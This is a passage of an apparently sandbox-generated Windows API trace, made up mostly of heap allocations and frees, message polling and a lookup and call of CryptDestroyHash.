hHeap=0x650000) returned 1 [0075.038] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96c8 | out: hHeap=0x650000) returned 1 [0075.038] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e558 | out: hHeap=0x650000) returned 1 [0075.038] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e498 | out: hHeap=0x650000) returned 1 [0075.038] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4e0 | out: hHeap=0x650000) returned 1 [0075.038] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96e8 | out: hHeap=0x650000) returned 1 [0075.038] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6a1020 | out: hHeap=0x650000) returned 1 [0075.038] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb478 | out: hHeap=0x650000) returned 1 [0075.038] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb478 [0075.038] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb538 | out: hHeap=0x650000) returned 1 [0075.038] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.038] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb538 [0075.038] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6a1020 [0075.038] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3e8 [0075.038] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6a1020 | out: hHeap=0x650000) returned 1 [0075.038] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3e8 | out: hHeap=0x650000) returned 1 [0075.038] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3e8 [0075.038] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb508 [0075.039] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96e8 [0075.039] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb388 [0075.039] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb388 | out: hHeap=0x650000) returned 1 [0075.039] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb508 | out: hHeap=0x650000) returned 1 [0075.039] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96e8 | out: hHeap=0x650000) returned 1 [0075.039] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3e8 | out: hHeap=0x650000) returned 1 [0075.039] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb538 | out: hHeap=0x650000) returned 1 [0075.039] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b8bb8 [0075.039] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.039] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b8bb8 | out: hHeap=0x650000) returned 1 [0075.039] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.039] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb538 [0075.039] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3e8 [0075.039] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3e8 | out: hHeap=0x650000) returned 1 [0075.039] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb538 | out: hHeap=0x650000) returned 1 [0075.039] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.039] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb538 [0075.039] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb538 | out: hHeap=0x650000) returned 1 [0075.039] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6b8ab8 | out: hHeap=0x650000) returned 1 [0075.039] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.039] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb538 [0075.039] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3e8 [0075.039] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96e8 [0075.039] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96e8 | out: hHeap=0x650000) returned 1 [0075.039] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3e8 | out: hHeap=0x650000) returned 1 [0075.039] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb538 | out: hHeap=0x650000) returned 1 [0075.039] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68def0 [0075.039] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76e4e0 [0075.039] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76e498 [0075.039] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76e558 [0075.039] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5a0 [0075.039] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76a970 [0075.040] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76e468 [0075.040] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76e1f8 [0075.040] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76e3a8 [0075.040] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e660 [0075.040] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76e330 [0075.040] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b5d0 [0075.040] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68def0 | out: hHeap=0x650000) returned 1 [0075.040] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76e678 [0075.040] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b138 [0075.040] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76b018 [0075.040] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76acd0 [0075.040] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e648 [0075.040] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76b0f0 [0075.040] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76e1c8 [0075.040] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e210 [0075.040] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76e138 [0075.040] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76b198 [0075.040] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68def0 [0075.040] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e360 [0075.040] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb538 [0075.040] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3e8 [0075.040] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692e90 [0075.040] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.040] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x692e90 | out: hHeap=0x650000) returned 1 [0075.040] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3e8 | out: hHeap=0x650000) returned 1 [0075.040] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76df58 [0075.040] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b780 [0075.040] PeekMessageW (in: lpMsg=0x61e3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e3fc) returned 0 [0075.040] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3e8 [0075.040] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb508 [0075.041] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb508 | out: hHeap=0x650000) returned 1 [0075.041] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3e8 | out: hHeap=0x650000) returned 1 [0075.041] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b780 | out: hHeap=0x650000) returned 1 [0075.041] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df58 | out: hHeap=0x650000) returned 1 [0075.041] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb538 | out: hHeap=0x650000) returned 1 [0075.041] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df58 [0075.041] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb538 [0075.041] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b090 [0075.041] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb538 | out: hHeap=0x650000) returned 1 [0075.041] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ae80 [0075.041] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb538 [0075.041] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e318 [0075.041] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb538 | out: hHeap=0x650000) returned 1 [0075.041] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e390 [0075.041] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb538 [0075.041] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76dfe8 [0075.041] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb538 | out: hHeap=0x650000) returned 1 [0075.041] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4b0 [0075.041] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb538 [0075.041] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb538 | out: hHeap=0x650000) returned 1 [0075.041] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb538 [0075.041] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4c8 [0075.041] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.041] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3c0 [0075.041] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3e8 [0075.041] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb508 [0075.041] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e408 [0075.041] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3c0 | out: hHeap=0x650000) returned 1 [0075.041] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3e8 | out: hHeap=0x650000) returned 1 [0075.041] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e408 | out: hHeap=0x650000) returned 1 [0075.044] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb508 | out: hHeap=0x650000) returned 1 [0075.044] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dd10 [0075.044] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb508 [0075.044] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e408 [0075.044] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3e8 [0075.045] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb388 [0075.045] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3c0 [0075.045] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e408 | out: hHeap=0x650000) returned 1 [0075.045] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3e8 | out: hHeap=0x650000) returned 1 [0075.045] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3c0 | out: hHeap=0x650000) returned 1 [0075.045] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb388 | out: hHeap=0x650000) returned 1 [0075.045] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3c0 [0075.045] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb388 [0075.045] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0075.045] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x11) returned 0x6f96e8 [0075.045] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x6f96e8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0075.045] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3c0 | out: hHeap=0x650000) returned 1 [0075.045] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dc48 [0075.045] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96e8 | out: hHeap=0x650000) returned 1 [0075.045] GetProcAddress (hModule=0x77710000, lpProcName="CryptDestroyHash") returned 0x7771df66 [0075.045] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dc48 | out: hHeap=0x650000) returned 1 [0075.045] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb388 | out: hHeap=0x650000) returned 1 [0075.045] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dc48 [0075.045] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb388 [0075.045] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb388 | out: hHeap=0x650000) returned 1 [0075.045] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dc48 | out: hHeap=0x650000) returned 1 [0075.045] CryptDestroyHash (hHash=0x6b89f8) returned 1 [0075.045] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb608 [0075.045] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x214) returned 0x6a1020 [0075.045] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb388 [0075.045] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3c0 [0075.045] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e408 [0075.046] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e060 [0075.046] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3e8 [0075.046] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e060 | out: hHeap=0x650000) returned 1 [0075.046] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3e8 | out: hHeap=0x650000) returned 1 [0075.046] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e408 | out: hHeap=0x650000) returned 1 [0075.046] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e408 [0075.046] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e060 [0075.046] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e240 [0075.046] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3e8 [0075.046] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e240 | out: hHeap=0x650000) returned 1 [0075.046] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3e8 | out: hHeap=0x650000) returned 1 [0075.046] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e060 | out: hHeap=0x650000) returned 1 [0075.046] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb508 | out: hHeap=0x650000) returned 1 [0075.046] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dd10 | out: hHeap=0x650000) returned 1 [0075.046] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4c8 | out: hHeap=0x650000) returned 1 [0075.046] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb538 | out: hHeap=0x650000) returned 1 [0075.046] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e360 | out: hHeap=0x650000) returned 1 [0075.046] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b090 | out: hHeap=0x650000) returned 1 [0075.046] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df58 | out: hHeap=0x650000) returned 1 [0075.046] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e318 | out: hHeap=0x650000) returned 1 [0075.046] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ae80 | out: hHeap=0x650000) returned 1 [0075.046] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76dfe8 | out: hHeap=0x650000) returned 1 [0075.046] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e390 | out: hHeap=0x650000) returned 1 [0075.046] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4b0 | out: hHeap=0x650000) returned 1 [0075.046] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68def0 | out: hHeap=0x650000) returned 1 [0075.046] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3c0 | out: hHeap=0x650000) returned 1 [0075.046] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e408 | out: hHeap=0x650000) returned 1 [0075.046] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb388 | out: hHeap=0x650000) returned 1 [0075.046] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6a1020 | out: hHeap=0x650000) returned 1 [0075.046] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb608 | out: hHeap=0x650000) returned 1 [0075.046] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4e0 | out: hHeap=0x650000) returned 1 [0075.046] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e498 | out: hHeap=0x650000) returned 1 [0075.047] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5a0 | out: hHeap=0x650000) returned 1 [0075.047] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e558 | out: hHeap=0x650000) returned 1 [0075.047] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a970 | out: hHeap=0x650000) returned 1 [0075.047] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e468 | out: hHeap=0x650000) returned 1 [0075.047] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1f8 | out: hHeap=0x650000) returned 1 [0075.047] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e660 | out: hHeap=0x650000) returned 1 [0075.047] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3a8 | out: hHeap=0x650000) returned 1 [0075.047] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e330 | out: hHeap=0x650000) returned 1 [0075.047] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b138 | out: hHeap=0x650000) returned 1 [0075.047] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e678 | out: hHeap=0x650000) returned 1 [0075.047] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b018 | out: hHeap=0x650000) returned 1 [0075.047] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e648 | out: hHeap=0x650000) returned 1 [0075.047] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76acd0 | out: hHeap=0x650000) returned 1 [0075.047] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b0f0 | out: hHeap=0x650000) returned 1 [0075.047] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e210 | out: hHeap=0x650000) returned 1 [0075.047] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1c8 | out: hHeap=0x650000) returned 1 [0075.047] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e138 | out: hHeap=0x650000) returned 1 [0075.047] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b198 | out: hHeap=0x650000) returned 1 [0075.047] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b5d0 | out: hHeap=0x650000) returned 1 [0075.047] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.047] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb608 [0075.047] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68def0 [0075.047] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b198 [0075.047] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb388 [0075.047] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb388 | out: hHeap=0x650000) returned 1 [0075.047] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e138 [0075.047] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb388 [0075.047] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb388 | out: hHeap=0x650000) returned 1 [0075.047] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e1c8 [0075.047] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb388 [0075.047] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb388 | out: hHeap=0x650000) returned 1 [0075.047] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b198 | out: hHeap=0x650000) returned 1 [0075.047] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e138 | out: hHeap=0x650000) returned 1 [0075.047] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1c8 | out: hHeap=0x650000) returned 1 [0075.048] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68def0 | out: hHeap=0x650000) returned 1 [0075.048] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb608 | out: hHeap=0x650000) returned 1 [0075.048] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b588 | out: hHeap=0x650000) returned 1 [0075.048] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e180 | out: hHeap=0x650000) returned 1 [0075.048] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e198 | out: hHeap=0x650000) returned 1 [0075.048] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1b0 | out: hHeap=0x650000) returned 1 [0075.048] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e348 | out: hHeap=0x650000) returned 1 [0075.048] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e588 | out: hHeap=0x650000) returned 1 [0075.048] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e510 | out: hHeap=0x650000) returned 1 [0075.048] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96a8 | out: hHeap=0x650000) returned 1 [0075.048] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6a0e00 | out: hHeap=0x650000) returned 1 [0075.048] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb478 | out: hHeap=0x650000) returned 1 [0075.048] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e300 | out: hHeap=0x650000) returned 1 [0075.048] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e618 | out: hHeap=0x650000) returned 1 [0075.048] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb418 | out: hHeap=0x650000) returned 1 [0075.048] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68df18 | out: hHeap=0x650000) returned 1 [0075.048] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76dfd0 | out: hHeap=0x650000) returned 1 [0075.048] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb598 | out: hHeap=0x650000) returned 1 [0075.048] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68b4b0 | out: hHeap=0x650000) returned 1 [0075.048] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4d8 | out: hHeap=0x650000) returned 1 [0075.048] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9728 | out: hHeap=0x650000) returned 1 [0075.048] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9748 | out: hHeap=0x650000) returned 1 [0075.048] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e2e8 | out: hHeap=0x650000) returned 1 [0075.048] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5b8 | out: hHeap=0x650000) returned 1 [0075.048] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb428 | out: hHeap=0x650000) returned 1 [0075.048] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dfe0 | out: hHeap=0x650000) returned 1 [0075.048] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e018 | out: hHeap=0x650000) returned 1 [0075.048] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dd60 | out: hHeap=0x650000) returned 1 [0075.048] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3b8 | out: hHeap=0x650000) returned 1 [0075.048] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dc70 | out: hHeap=0x650000) returned 1 [0075.048] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e708 | out: hHeap=0x650000) returned 1 [0075.048] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76dfa0 | out: hHeap=0x650000) returned 1 [0075.048] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4f8 | out: hHeap=0x650000) returned 1 [0075.048] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68d9f0 | out: hHeap=0x650000) returned 1 [0075.048] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df88 | out: 